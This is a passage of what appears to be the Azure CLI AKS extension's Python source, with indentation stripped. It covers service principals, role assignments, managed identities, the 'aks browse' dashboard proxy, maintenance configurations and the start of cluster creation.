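#   {"<subscription-id>": {"client_secret": "<secret>", "service_principal": "<app-id>"}}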
def load_acs_service_principal(subscription_id, file_name='acsServicePrincipal.json'):
config_path = os.path.join(get_config_dir(), file_name)
config = load_service_principals(config_path)
if not config:
return None
return config.get(subscription_id)
def load_service_principals(config_path):
if not os.path.exists(config_path):
return None
fd = os.open(config_path, os.O_RDONLY)
try:
with os.fdopen(fd) as f:
return shell_safe_json_parse(f.read())
except: # pylint: disable=bare-except
return None
def _invoke_deployment(cmd, resource_group_name, deployment_name, template, parameters, validate, no_wait,
subscription_id=None):
from azure.cli.core.profiles import ResourceType
DeploymentProperties = cmd.get_models(
'DeploymentProperties', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
properties = DeploymentProperties(
template=template, parameters=parameters, mode='incremental')
smc = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES,
subscription_id=subscription_id).deployments
if validate:
logger.info('==== BEGIN TEMPLATE ====')
logger.info(json.dumps(template, indent=2))
logger.info('==== END TEMPLATE ====')
Deployment = cmd.get_models('Deployment', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
deployment = Deployment(properties=properties)
if validate:
if cmd.supported_api_version(min_api='2019-10-01', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES):
validation_poller = smc.begin_validate(resource_group_name, deployment_name, deployment)
return LongRunningOperation(cmd.cli_ctx)(validation_poller)
else:
return smc.validate(resource_group_name, deployment_name, deployment)
return sdk_no_wait(no_wait, smc.begin_create_or_update, resource_group_name, deployment_name, deployment)
def create_application(client, display_name, homepage, identifier_uris,
available_to_other_tenants=False, password=None, reply_urls=None,
key_value=None, key_type=None, key_usage=None, start_date=None,
end_date=None):
from azure.graphrbac.models import GraphErrorException
password_creds, key_creds = _build_application_creds(password=password, key_value=key_value, key_type=key_type,
key_usage=key_usage, start_date=start_date, end_date=end_date)
app_create_param = ApplicationCreateParameters(available_to_other_tenants=available_to_other_tenants,
display_name=display_name,
identifier_uris=identifier_uris,
homepage=homepage,
reply_urls=reply_urls,
key_credentials=key_creds,
password_credentials=password_creds)
try:
return client.create(app_create_param)
except GraphErrorException as ex:
if 'insufficient privileges' in str(ex).lower():
link = 'https://docs.microsoft.com/azure/azure-resource-manager/resource-group-create-service-principal-portal' # pylint: disable=line-too-long
raise CLIError("Directory permission is needed for the current user to register the application. "
"For how to configure, please refer '{}'. Original error: {}".format(link, ex))
raise
def _build_application_creds(password=None, key_value=None, key_type=None,
key_usage=None, start_date=None, end_date=None):
if password and key_value:
raise CLIError(
'specify either --password or --key-value, but not both.')
if not start_date:
start_date = datetime.datetime.utcnow()
elif isinstance(start_date, str):
start_date = parse(start_date)
if not end_date:
end_date = start_date + relativedelta(years=1)
elif isinstance(end_date, str):
end_date = parse(end_date)
key_type = key_type or 'AsymmetricX509Cert'
key_usage = key_usage or 'Verify'
password_creds = None
key_creds = None
if password:
password_creds = [PasswordCredential(start_date=start_date, end_date=end_date,
key_id=str(uuid.uuid4()), value=password)]
elif key_value:
key_creds = [KeyCredential(start_date=start_date, end_date=end_date, value=key_value,
key_id=str(uuid.uuid4()), usage=key_usage, type=key_type)]
return (password_creds, key_creds)
def create_service_principal(cli_ctx, identifier, resolve_app=True, rbac_client=None):
if rbac_client is None:
rbac_client = get_graph_rbac_management_client(cli_ctx)
if resolve_app:
try:
uuid.UUID(identifier)
result = list(rbac_client.applications.list(
filter="appId eq '{}'".format(identifier)))
except ValueError:
result = list(rbac_client.applications.list(
filter="identifierUris/any(s:s eq '{}')".format(identifier)))
if not result: # assume we get an object id
result = [rbac_client.applications.get(identifier)]
app_id = result[0].app_id
else:
app_id = identifier
return rbac_client.service_principals.create(ServicePrincipalCreateParameters(app_id=app_id, account_enabled=True))
def create_role_assignment(cli_ctx, role, assignee, is_service_principal, resource_group_name=None, scope=None):
return _create_role_assignment(cli_ctx,
role, assignee, resource_group_name,
scope, resolve_assignee=is_service_principal)
def _create_role_assignment(cli_ctx, role, assignee,
resource_group_name=None, scope=None, resolve_assignee=True):
from azure.cli.core.profiles import ResourceType, get_sdk
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
definitions_client = factory.role_definitions
scope = _build_role_scope(
resource_group_name, scope, assignments_client.config.subscription_id)
    # XXX: if role is uuid, this function's output cannot be used as role assignment definition id
# ref: https://github.com/Azure/azure-cli/issues/2458
role_id = _resolve_role_id(role, scope, definitions_client)
# If the cluster has service principal resolve the service principal client id to get the object id,
# if not use MSI object id.
object_id = _resolve_object_id(
cli_ctx, assignee) if resolve_assignee else assignee
RoleAssignmentCreateParameters = get_sdk(cli_ctx, ResourceType.MGMT_AUTHORIZATION,
'RoleAssignmentCreateParameters', mod='models',
operation_group='role_assignments')
parameters = RoleAssignmentCreateParameters(
role_definition_id=role_id, principal_id=object_id)
assignment_name = uuid.uuid4()
custom_headers = None
return assignments_client.create(scope, assignment_name, parameters, custom_headers=custom_headers)
def delete_role_assignments(cli_ctx, ids=None, assignee=None, role=None, resource_group_name=None,
scope=None, include_inherited=False, yes=None):
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
definitions_client = factory.role_definitions
ids = ids or []
if ids:
if assignee or role or resource_group_name or scope or include_inherited:
raise CLIError(
'When assignment ids are used, other parameter values are not required')
for i in ids:
assignments_client.delete_by_id(i)
return
    if not any([ids, assignee, role, resource_group_name, scope, yes]):
from knack.prompting import prompt_y_n
msg = 'This will delete all role assignments under the subscription. Are you sure?'
if not prompt_y_n(msg, default="n"):
return
scope = _build_role_scope(resource_group_name, scope,
assignments_client.config.subscription_id)
assignments = _search_role_assignments(cli_ctx, assignments_client, definitions_client,
scope, assignee, role, include_inherited,
include_groups=False)
if assignments:
for a in assignments:
assignments_client.delete_by_id(a.id)
def _search_role_assignments(cli_ctx, assignments_client, definitions_client,
scope, assignee, role, include_inherited, include_groups):
assignee_object_id = None
if assignee:
assignee_object_id = _resolve_object_id(cli_ctx, assignee)
# always use "scope" if provided, so we can get assignments beyond subscription e.g. management groups
if scope:
assignments = list(assignments_client.list_for_scope(
scope=scope, filter='atScope()'))
elif assignee_object_id:
if include_groups:
f = "assignedTo('{}')".format(assignee_object_id)
else:
f = "principalId eq '{}'".format(assignee_object_id)
assignments = list(assignments_client.list(filter=f))
else:
assignments = list(assignments_client.list())
if assignments:
assignments = [a for a in assignments if (
not scope or
include_inherited and re.match(_get_role_property(a, 'scope'), scope, re.I) or
_get_role_property(a, 'scope').lower() == scope.lower()
)]
if role:
role_id = _resolve_role_id(role, scope, definitions_client)
assignments = [i for i in assignments if _get_role_property(
i, 'role_definition_id') == role_id]
if assignee_object_id:
assignments = [i for i in assignments if _get_role_property(
i, 'principal_id') == assignee_object_id]
return assignments
def _get_role_property(obj, property_name):
if isinstance(obj, dict):
return obj[property_name]
return getattr(obj, property_name)
def _build_role_scope(resource_group_name, scope, subscription_id):
subscription_scope = '/subscriptions/' + subscription_id
if scope:
if resource_group_name:
err = 'Resource group "{}" is redundant because scope is supplied'
raise CLIError(err.format(resource_group_name))
elif resource_group_name:
scope = subscription_scope + '/resourceGroups/' + resource_group_name
else:
scope = subscription_scope
return scope
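# Sketch of the scopes produced (placeholder ids):
#   _build_role_scope(None, None, sub)      -> "/subscriptions/<sub>"
#   _build_role_scope("my-rg", None, sub)   -> "/subscriptions/<sub>/resourceGroups/my-rg"
#   _build_role_scope(None, "<scope>", sub) -> "<scope>" unchanged (rg and scope together raise)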
def _resolve_role_id(role, scope, definitions_client):
role_id = None
try:
uuid.UUID(role)
role_id = role
except ValueError:
pass
if not role_id: # retrieve role id
role_defs = list(definitions_client.list(
scope, "roleName eq '{}'".format(role)))
if not role_defs:
raise CLIError("Role '{}' doesn't exist.".format(role))
if len(role_defs) > 1:
ids = [r.id for r in role_defs]
err = "More than one role matches the given name '{}'. Please pick a value from '{}'"
raise CLIError(err.format(role, ids))
role_id = role_defs[0].id
return role_id
def _resolve_object_id(cli_ctx, assignee):
client = get_graph_rbac_management_client(cli_ctx)
result = None
if assignee.find('@') >= 0: # looks like a user principal name
result = list(client.users.list(
filter="userPrincipalName eq '{}'".format(assignee)))
if not result:
result = list(client.service_principals.list(
filter="servicePrincipalNames/any(c:c eq '{}')".format(assignee)))
if not result: # assume an object id, let us verify it
result = _get_object_stubs(client, [assignee])
# 2+ matches should never happen, so we only check 'no match' here
if not result:
raise CLIError(
"No matches in graph database for '{}'".format(assignee))
return result[0].object_id
def _get_object_stubs(graph_client, assignees):
params = GetObjectsParameters(include_directory_object_references=True,
object_ids=assignees)
return list(graph_client.objects.get_objects_by_object_ids(params))
def subnet_role_assignment_exists(cli_ctx, scope):
network_contributor_role_id = "4d97b98b-1d4f-4787-a291-c67834d212e7"
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
for i in assignments_client.list_for_scope(scope=scope, filter='atScope()'):
if i.scope == scope and i.role_definition_id.endswith(network_contributor_role_id):
return True
return False
_re_user_assigned_identity_resource_id = re.compile(
r'/subscriptions/(.*?)/resourcegroups/(.*?)/providers/microsoft.managedidentity/userassignedidentities/(.*)',
flags=re.IGNORECASE)
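# The regex matches (case-insensitively) resource ids of the form:
#   /subscriptions/<sub>/resourceGroups/<rg>/providers/Microsoft.ManagedIdentity/userAssignedIdentities/<name>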
def _get_user_assigned_identity(cli_ctx, resource_id):
resource_id = resource_id.lower()
match = _re_user_assigned_identity_resource_id.search(resource_id)
if match:
subscription_id = match.group(1)
resource_group_name = match.group(2)
identity_name = match.group(3)
msi_client = get_msi_client(cli_ctx, subscription_id)
try:
identity = msi_client.user_assigned_identities.get(resource_group_name=resource_group_name,
resource_name=identity_name)
except CloudError as ex:
if 'was not found' in ex.message:
raise CLIError("Identity {} not found.".format(resource_id))
raise CLIError(ex.message)
return identity
raise CLIError(
"Cannot parse identity name from provided resource id {}.".format(resource_id))
def _get_user_assigned_identity_client_id(cli_ctx, resource_id):
return _get_user_assigned_identity(cli_ctx, resource_id).client_id
def _get_user_assigned_identity_object_id(cli_ctx, resource_id):
return _get_user_assigned_identity(cli_ctx, resource_id).principal_id
def _update_dict(dict1, dict2):
cp = dict1.copy()
cp.update(dict2)
return cp
def aks_browse(cmd, # pylint: disable=too-many-statements,too-many-branches
client,
resource_group_name,
name,
disable_browser=False,
listen_address='127.0.0.1',
listen_port='8001'):
# verify the kube-dashboard addon was not disabled
instance = client.get(resource_group_name, name)
addon_profiles = instance.addon_profiles or {}
# addon name is case insensitive
addon_profile = next((addon_profiles[k] for k in addon_profiles
if k.lower() == CONST_KUBE_DASHBOARD_ADDON_NAME.lower()),
ManagedClusterAddonProfile(enabled=False))
# open portal view if addon is not enabled or k8s version >= 1.19.0
if StrictVersion(instance.kubernetes_version) >= StrictVersion('1.19.0') or (not addon_profile.enabled):
subscription_id = get_subscription_id(cmd.cli_ctx)
dashboardURL = (
# Azure Portal URL (https://portal.azure.com for public cloud)
cmd.cli_ctx.cloud.endpoints.portal +
('/#resource/subscriptions/{0}/resourceGroups/{1}/providers/Microsoft.ContainerService'
'/managedClusters/{2}/workloads').format(subscription_id, resource_group_name, name)
)
if in_cloud_console():
logger.warning(
'To view the Kubernetes resources view, please open %s in a new tab', dashboardURL)
else:
logger.warning('Kubernetes resources view on %s', dashboardURL)
if not disable_browser:
webbrowser.open_new_tab(dashboardURL)
return
# otherwise open the kube-dashboard addon
if not which('kubectl'):
raise CLIError('Can not find kubectl executable in PATH')
_, browse_path = tempfile.mkstemp()
aks_get_credentials(cmd, client, resource_group_name,
name, admin=False, path=browse_path)
# find the dashboard pod's name
try:
dashboard_pod = subprocess.check_output(
["kubectl", "get", "pods", "--kubeconfig", browse_path, "--namespace", "kube-system",
"--output", "name", "--selector", "k8s-app=kubernetes-dashboard"],
universal_newlines=True)
except subprocess.CalledProcessError as err:
raise CLIError('Could not find dashboard pod: {}'.format(err))
if dashboard_pod:
# remove any "pods/" or "pod/" prefix from the name
dashboard_pod = str(dashboard_pod).split('/')[-1].strip()
else:
raise CLIError("Couldn't find the Kubernetes dashboard pod.")
# find the port
try:
dashboard_port = subprocess.check_output(
["kubectl", "get", "pods", "--kubeconfig", browse_path, "--namespace", "kube-system",
"--selector", "k8s-app=kubernetes-dashboard",
"--output", "jsonpath='{.items[0].spec.containers[0].ports[0].containerPort}'"]
)
# output format: b"'{port}'"
dashboard_port = int((dashboard_port.decode('utf-8').replace("'", "")))
except subprocess.CalledProcessError as err:
raise CLIError('Could not find dashboard port: {}'.format(err))
# use https if dashboard container is using https
if dashboard_port == 8443:
protocol = 'https'
else:
protocol = 'http'
proxy_url = 'http://{0}:{1}/'.format(listen_address, listen_port)
dashboardURL = '{0}/api/v1/namespaces/kube-system/services/{1}:kubernetes-dashboard:/proxy/'.format(proxy_url,
protocol)
# launch kubectl port-forward locally to access the remote dashboard
if in_cloud_console():
# TODO: better error handling here.
response = requests.post(
'http://localhost:8888/openport/{0}'.format(listen_port))
result = json.loads(response.text)
dashboardURL = '{0}api/v1/namespaces/kube-system/services/{1}:kubernetes-dashboard:/proxy/'.format(
result['url'], protocol)
term_id = os.environ.get('ACC_TERM_ID')
if term_id:
response = requests.post('http://localhost:8888/openLink/{0}'.format(term_id),
json={"url": dashboardURL})
logger.warning(
'To view the console, please open %s in a new tab', dashboardURL)
else:
logger.warning('Proxy running on %s', proxy_url)
logger.warning('Press CTRL+C to close the tunnel...')
if not disable_browser:
wait_then_open_async(dashboardURL)
try:
try:
subprocess.check_output(["kubectl", "--kubeconfig", browse_path, "proxy", "--address",
listen_address, "--port", listen_port], stderr=subprocess.STDOUT)
except subprocess.CalledProcessError as err:
            if b'unknown flag: --address' in err.output:
if listen_address != '127.0.0.1':
logger.warning(
'"--address" is only supported in kubectl v1.13 and later.')
logger.warning(
'The "--listen-address" argument will be ignored.')
subprocess.call(["kubectl", "--kubeconfig",
browse_path, "proxy", "--port", listen_port])
except KeyboardInterrupt:
# Let command processing finish gracefully after the user presses [Ctrl+C]
pass
finally:
if in_cloud_console():
requests.post('http://localhost:8888/closeport/8001')
def _trim_nodepoolname(nodepool_name):
if not nodepool_name:
return "nodepool1"
return nodepool_name[:12]
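# e.g. _trim_nodepoolname("averylongnodepoolname") -> "averylongnod" (kept to the 12-char ACS RP limit)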
def _add_monitoring_role_assignment(result, cluster_resource_id, cmd):
service_principal_msi_id = None
# Check if service principal exists, if it does, assign permissions to service principal
# Else, provide permissions to MSI
if (
hasattr(result, 'service_principal_profile') and
hasattr(result.service_principal_profile, 'client_id') and
result.service_principal_profile.client_id != 'msi'
):
logger.info('valid service principal exists, using it')
service_principal_msi_id = result.service_principal_profile.client_id
is_service_principal = True
elif (
(hasattr(result, 'addon_profiles')) and
(CONST_MONITORING_ADDON_NAME in result.addon_profiles) and
(hasattr(result.addon_profiles[CONST_MONITORING_ADDON_NAME], 'identity')) and
(hasattr(
result.addon_profiles[CONST_MONITORING_ADDON_NAME].identity, 'object_id'))
):
logger.info('omsagent MSI exists, using it')
service_principal_msi_id = result.addon_profiles[CONST_MONITORING_ADDON_NAME].identity.object_id
is_service_principal = False
if service_principal_msi_id is not None:
if not _add_role_assignment(cmd.cli_ctx, 'Monitoring Metrics Publisher',
service_principal_msi_id, is_service_principal, scope=cluster_resource_id):
logger.warning('Could not create a role assignment for Monitoring addon. '
'Are you an Owner on this subscription?')
else:
        logger.warning('Could not find service principal or user assigned MSI for role '
                       'assignment')
def _add_ingress_appgw_addon_role_assignment(result, cmd):
service_principal_msi_id = None
# Check if service principal exists, if it does, assign permissions to service principal
# Else, provide permissions to MSI
if (
hasattr(result, 'service_principal_profile') and
hasattr(result.service_principal_profile, 'client_id') and
result.service_principal_profile.client_id != 'msi'
):
service_principal_msi_id = result.service_principal_profile.client_id
is_service_principal = True
elif (
(hasattr(result, 'addon_profiles')) and
(CONST_INGRESS_APPGW_ADDON_NAME in result.addon_profiles) and
(hasattr(result.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME], 'identity')) and
(hasattr(
result.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].identity, 'object_id'))
):
service_principal_msi_id = result.addon_profiles[
CONST_INGRESS_APPGW_ADDON_NAME].identity.object_id
is_service_principal = False
if service_principal_msi_id is not None:
config = result.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].config
from msrestazure.tools import parse_resource_id, resource_id
if CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID in config:
appgw_id = config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID]
parsed_appgw_id = parse_resource_id(appgw_id)
appgw_group_id = resource_id(subscription=parsed_appgw_id["subscription"],
resource_group=parsed_appgw_id["resource_group"])
if not _add_role_assignment(cmd.cli_ctx, 'Contributor',
service_principal_msi_id, is_service_principal, scope=appgw_group_id):
logger.warning('Could not create a role assignment for application gateway: %s '
'specified in %s addon. '
'Are you an Owner on this subscription?', appgw_id, CONST_INGRESS_APPGW_ADDON_NAME)
if CONST_INGRESS_APPGW_SUBNET_ID in config:
subnet_id = config[CONST_INGRESS_APPGW_SUBNET_ID]
if not _add_role_assignment(cmd.cli_ctx, 'Network Contributor',
service_principal_msi_id, is_service_principal, scope=subnet_id):
logger.warning('Could not create a role assignment for subnet: %s '
'specified in %s addon. '
'Are you an Owner on this subscription?', subnet_id, CONST_INGRESS_APPGW_ADDON_NAME)
if CONST_INGRESS_APPGW_SUBNET_CIDR in config:
if result.agent_pool_profiles[0].vnet_subnet_id is not None:
parsed_subnet_vnet_id = parse_resource_id(
result.agent_pool_profiles[0].vnet_subnet_id)
vnet_id = resource_id(subscription=parsed_subnet_vnet_id["subscription"],
resource_group=parsed_subnet_vnet_id["resource_group"],
namespace="Microsoft.Network",
type="virtualNetworks",
name=parsed_subnet_vnet_id["name"])
if not _add_role_assignment(cmd.cli_ctx, 'Contributor',
service_principal_msi_id, is_service_principal, scope=vnet_id):
logger.warning('Could not create a role assignment for virtual network: %s '
'specified in %s addon. '
'Are you an Owner on this subscription?', vnet_id, CONST_INGRESS_APPGW_ADDON_NAME)
def aks_maintenanceconfiguration_list(
cmd,
client,
resource_group_name,
cluster_name
):
return client.list_by_managed_cluster(resource_group_name, cluster_name)
def aks_maintenanceconfiguration_show(
cmd,
client,
resource_group_name,
cluster_name,
config_name
):
logger.warning('resource_group_name: %s, cluster_name: %s, config_name: %s ',
resource_group_name, cluster_name, config_name)
return client.get(resource_group_name, cluster_name, config_name)
def aks_maintenanceconfiguration_delete(
cmd,
client,
resource_group_name,
cluster_name,
config_name
):
logger.warning('resource_group_name: %s, cluster_name: %s, config_name: %s ',
resource_group_name, cluster_name, config_name)
return client.delete(resource_group_name, cluster_name, config_name)
def aks_maintenanceconfiguration_add(
cmd,
client,
resource_group_name,
cluster_name,
config_name,
config_file,
weekday,
start_hour
):
configs = client.list_by_managed_cluster(resource_group_name, cluster_name)
for config in configs:
if config.name == config_name:
raise CLIError("Maintenance configuration '{}' already exists, please try a different name, "
"use 'aks maintenanceconfiguration list' to get current list of maitenance configurations".format(config_name))
return aks_maintenanceconfiguration_update_internal(cmd, client, resource_group_name, cluster_name, config_name, config_file, weekday, start_hour)
def aks_maintenanceconfiguration_update(
cmd,
client,
resource_group_name,
cluster_name,
config_name,
config_file,
weekday,
start_hour
):
configs = client.list_by_managed_cluster(resource_group_name, cluster_name)
found = False
for config in configs:
if config.name == config_name:
found = True
break
if not found:
raise CLIError("Maintenance configuration '{}' doesn't exist."
"use 'aks maintenanceconfiguration list' to get current list of maitenance configurations".format(config_name))
return aks_maintenanceconfiguration_update_internal(cmd, client, resource_group_name, cluster_name, config_name, config_file, weekday, start_hour)
def aks_create(cmd, # pylint: disable=too-many-locals,too-many-statements,too-many-branches
client,
resource_group_name,
name,
ssh_key_value,
dns_name_prefix=None,
location=None,
admin_username="azureuser",
windows_admin_username=None,
windows_admin_password=None,
enable_ahub=False,
kubernetes_version='',
node_vm_size="Standard_DS2_v2",
node_osdisk_type=None,
node_osdisk_size=0,
node_osdisk_diskencryptionset_id=None,
node_count=3,
nodepool_name="nodepool1",
nodepool_tags=None,
nodepool_labels=None,
service_principal=None, client_secret=None,
no_ssh_key=False,
disable_rbac=None,
enable_rbac=None,
enable_vmss=None,
vm_set_type=None,
skip_subnet_role_assignment=False,
os_sku=None,
enable_fips_image=False,
enable_cluster_autoscaler=False,
cluster_autoscaler_profile=None,
network_plugin=None,
network_policy=None,
pod_cidr=None,
service_cidr=None,
dns_service_ip=None,
docker_bridge_address=None,
load_balancer_sku=None,
load_balancer_managed_outbound_ip_count=None,
load_balancer_outbound_ips=None,
load_balancer_outbound_ip_prefixes=None,
load_balancer_outbound_ports=None,
load_balancer_idle_timeout=None,
outbound_type=None,
enable_addons=None,
workspace_resource_id=None,
min_count=None,
max_count=None,
vnet_subnet_id=None,
pod_subnet_id=None,
ppg=None,
max_pods=0,
aad_client_app_id=None,
aad_server_app_id=None,
aad_server_app_secret=None,
aad_tenant_id=None,
tags=None,
node_zones=None,
enable_node_public_ip=False,
node_public_ip_prefix_id=None,
generate_ssh_keys=False, # pylint: disable=unused-argument
enable_pod_security_policy=False,
node_resource_group=None,
uptime_sla=False,
attach_acr=None,
enable_private_cluster=False,
private_dns_zone=None,
enable_managed_identity=True,
fqdn_subdomain=None,
api_server_authorized_ip_ranges=None,
aks_custom_headers=None,
appgw_name=None,
appgw_subnet_prefix=None,
appgw_subnet_cidr=None,
appgw_id=None,
appgw_subnet_id=None,
appgw_watch_namespace=None,
enable_aad=False,
enable_azure_rbac=False,
aad_admin_group_object_ids=None,
aci_subnet_name=None,
enable_sgxquotehelper=False,
kubelet_config=None,
linux_os_config=None,
assign_identity=None,
auto_upgrade_channel=None,
enable_pod_identity=False,
enable_pod_identity_with_kubenet=False,
enable_encryption_at_host=False,
enable_secret_rotation=False,
disable_local_accounts=False,
no_wait=False,
assign_kubelet_identity=None,
yes=False):
if not no_ssh_key:
try:
if not ssh_key_value or not is_valid_ssh_rsa_public_key(ssh_key_value):
raise ValueError()
except (TypeError, ValueError):
shortened_key = truncate_text(ssh_key_value)
raise CLIError(
'Provided ssh key ({}) is invalid or non-existent'.format(shortened_key))
subscription_id = get_subscription_id(cmd.cli_ctx)
if dns_name_prefix and fqdn_subdomain:
raise CLIError(
'--dns-name-prefix and --fqdn-subdomain cannot be used at same time')
if not dns_name_prefix and not fqdn_subdomain:
dns_name_prefix = _get_default_dns_prefix(
name, resource_group_name, subscription_id)
rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name)
if location is None:
location = rg_location
# Flag to be removed, kept for back-compatibility only. Remove the below section
# when we deprecate the enable-vmss flag
if enable_vmss:
if vm_set_type and vm_set_type.lower() != "VirtualMachineScaleSets".lower():
raise CLIError('enable-vmss and provided vm_set_type ({}) are conflicting with each other'.
format(vm_set_type))
vm_set_type = "VirtualMachineScaleSets"
vm_set_type = _set_vm_set_type(vm_set_type, kubernetes_version)
load_balancer_sku = set_load_balancer_sku(
load_balancer_sku, kubernetes_version)
if api_server_authorized_ip_ranges and load_balancer_sku == "basic":
raise CLIError(
'--api-server-authorized-ip-ranges can only be used with standard load balancer')
agent_pool_profile = ManagedClusterAgentPoolProfile(
# Must be 12 chars or less before ACS RP adds to it
name=_trim_nodepoolname(nodepool_name),
tags=nodepool_tags,
node_labels=nodepool_labels,
count=int(node_count),
vm_size=node_vm_size,
os_type="Linux",
os_sku=os_sku,
mode="System",
vnet_subnet_id=vnet_subnet_id,
pod_subnet_id=pod_subnet_id,
proximity_placement_group_id=ppg,
availability_zones=node_zones,
enable_node_public_ip=enable_node_public_ip,
enable_fips=enable_fips_image,
node_public_ip_prefix_id=node_public_ip_prefix_id,
enable_encryption_at_host=enable_encryption_at_host,
max_pods=int(max_pods) if max_pods else None,
type=vm_set_type
)
if node_osdisk_size:
agent_pool_profile.os_disk_size_gb = int(node_osdisk_size)
if node_osdisk_type:
agent_pool_profile.os_disk_type = node_osdisk_type
_check_cluster_autoscaler_flag(
enable_cluster_autoscaler, min_count, max_count, node_count, agent_pool_profile)
if kubelet_config:
agent_pool_profile.kubelet_config = _get_kubelet_config(kubelet_config)
if linux_os_config:
agent_pool_profile.linux_os_config = _get_linux_os_config(
linux_os_config)
linux_profile = None
# LinuxProfile is just used for SSH access to VMs, so omit it if --no-ssh-key was specified.
if not no_ssh_key:
ssh_config = ContainerServiceSshConfiguration(
public_keys=[ContainerServiceSshPublicKey(key_data=ssh_key_value)])
linux_profile = ContainerServiceLinuxProfile(
admin_username=admin_username, ssh=ssh_config)
windows_profile = None
if windows_admin_username:
if windows_admin_password is None:
try:
windows_admin_password = prompt_pass(
msg='windows-admin-password: ', confirm=True)
except NoTTYException:
raise CLIError(
'Please specify both username and password in non-interactive mode.')
windows_license_type = None
if enable_ahub:
windows_license_type = 'Windows_Server'
windows_profile = ManagedClusterWindowsProfile(
admin_username=windows_admin_username,
admin_password=windows_admin_password,
license_type=windows_license_type)
service_principal_profile = None
principal_obj = None
# If customer explicitly provide a service principal, disable managed identity.
if service_principal and client_secret:
enable_managed_identity = False
if not enable_managed_identity:
principal_obj = _ensure_aks_service_principal(cmd.cli_ctx,
service_principal=service_principal, client_secret=client_secret,
subscription_id=subscription_id, dns_name_prefix=dns_name_prefix,
fqdn_subdomain=fqdn_subdomain, location=location, name=name)
service_principal_profile = ManagedClusterServicePrincipalProfile(
client_id=principal_obj.get("service_principal"),
secret=principal_obj.get("client_secret"))
if attach_acr:
if enable_managed_identity:
if no_wait:
raise CLIError('When --attach-acr and --enable-managed-identity are both specified, '
'--no-wait is not allowed, please wait until the whole operation succeeds.')
else:
_ensure_aks_acr(cmd.cli_ctx,
client_id=service_principal_profile.client_id,
acr_name_or_id=attach_acr,
subscription_id=subscription_id)
need_post_creation_vnet_permission_granting = False
if (vnet_subnet_id and not skip_subnet_role_assignment and
not subnet_role_assignment_exists(cmd.cli_ctx, vnet_subnet_id)):
# if service_principal_profile is None, then this cluster is an MSI cluster,
# and the service principal does not exist. Two cases:
# 1. For system assigned identity, we just tell user to grant the
# permission after the cluster is created to keep consistent with portal experience.
# 2. For user assigned identity, we can grant needed permission to
# user provided user assigned identity before creating managed cluster.
if service_principal_profile is None and not assign_identity:
msg = ('It is highly recommended to use USER assigned identity '
                   '(option --assign-identity) when you want to bring your own '
'subnet, which will have no latency for the role assignment to '
'take effect. When using SYSTEM assigned identity, '
'azure-cli will grant Network Contributor role to the '
'system assigned identity after the cluster is created, and '
'the role assignment will take some time to take effect, see '
'https://docs.microsoft.com/en-us/azure/aks/use-managed-identity, '
'proceed to create cluster with system assigned identity?')
from knack.prompting import prompt_y_n
if not yes and not prompt_y_n(msg, default="n"):
return None
need_post_creation_vnet_permission_granting = True
else:
scope = vnet_subnet_id
identity_client_id = ""
if assign_identity:
identity_client_id = _get_user_assigned_identity_client_id(
cmd.cli_ctx, assign_identity)
else:
identity_client_id = service_principal_profile.client_id
if not _add_role_assignment(cmd.cli_ctx, 'Network Contributor',
identity_client_id, scope=scope):
logger.warning('Could not create a role assignment for subnet. '
'Are you an Owner on this subscription?')
load_balancer_profile = create_load_balancer_profile(
load_balancer_managed_outbound_ip_count,
load_balancer_outbound_ips,
load_balancer_outbound_ip_prefixes,
load_balancer_outbound_ports,
load_balancer_idle_timeout)
outbound_type = _set_outbound_type(
outbound_type, network_plugin, load_balancer_sku, load_balancer_profile)
network_profile = None
if any([network_plugin,
pod_cidr,
service_cidr,
dns_service_ip,
docker_bridge_address,
network_policy]):
if not network_plugin:
raise CLIError('Please explicitly specify the network plugin type')
if pod_cidr and network_plugin == "azure":
raise CLIError(
'Please use kubenet as the network plugin type when pod_cidr is specified')
network_profile = ContainerServiceNetworkProfile(
network_plugin=network_plugin,
pod_cidr=pod_cidr,
service_cidr=service_cidr,
dns_service_ip=dns_service_ip,
docker_bridge_cidr=docker_bridge_address,
network_policy=network_policy,
load_balancer_sku=load_balancer_sku.lower(),
load_balancer_profile=load_balancer_profile,
outbound_type=outbound_type
)
else:
if load_balancer_sku.lower() == "standard" or load_balancer_profile:
network_profile = ContainerServiceNetworkProfile(
network_plugin="kubenet",
load_balancer_sku=load_balancer_sku.lower(),
load_balancer_profile=load_balancer_profile,
outbound_type=outbound_type,
)
if load_balancer_sku.lower() == "basic":
network_profile = ContainerServiceNetworkProfile(
load_balancer_sku=load_balancer_sku.lower(),
)
addon_profiles = _handle_addons_args(
cmd,
enable_addons,
subscription_id,
resource_group_name,
{},
workspace_resource_id,
appgw_name,
appgw_subnet_prefix,
appgw_subnet_cidr,
appgw_id,
appgw_subnet_id,
appgw_watch_namespace,
enable_sgxquotehelper,
aci_subnet_name,
vnet_subnet_id,
enable_secret_rotation
)
monitoring = False
if CONST_MONITORING_ADDON_NAME in addon_profiles:
monitoring = True
_ensure_container_insights_for_monitoring(
cmd, addon_profiles[CONST_MONITORING_ADDON_NAME])
# addon is in the list and is enabled
ingress_appgw_addon_enabled = CONST_INGRESS_APPGW_ADDON_NAME in addon_profiles and \
addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].enabled
os_type = 'Linux'
enable_virtual_node = False
if CONST_VIRTUAL_NODE_ADDON_NAME + os_type in addon_profiles:
enable_virtual_node = True
aad_profile = None
if enable_aad:
if any([aad_client_app_id, aad_server_app_id, aad_server_app_secret]):
raise CLIError('"--enable-aad" cannot be used together with '
'"--aad-client-app-id/--aad-server-app-id/--aad-server-app-secret"')
if disable_rbac and enable_azure_rbac:
raise CLIError(
'"--enable-azure-rbac" can not be used together with "--disable-rbac"')
aad_profile = ManagedClusterAADProfile(
managed=True,
enable_azure_rbac=enable_azure_rbac,
admin_group_object_ids=_parse_comma_separated_list(
aad_admin_group_object_ids),
tenant_id=aad_tenant_id
)
else:
if aad_admin_group_object_ids is not None:
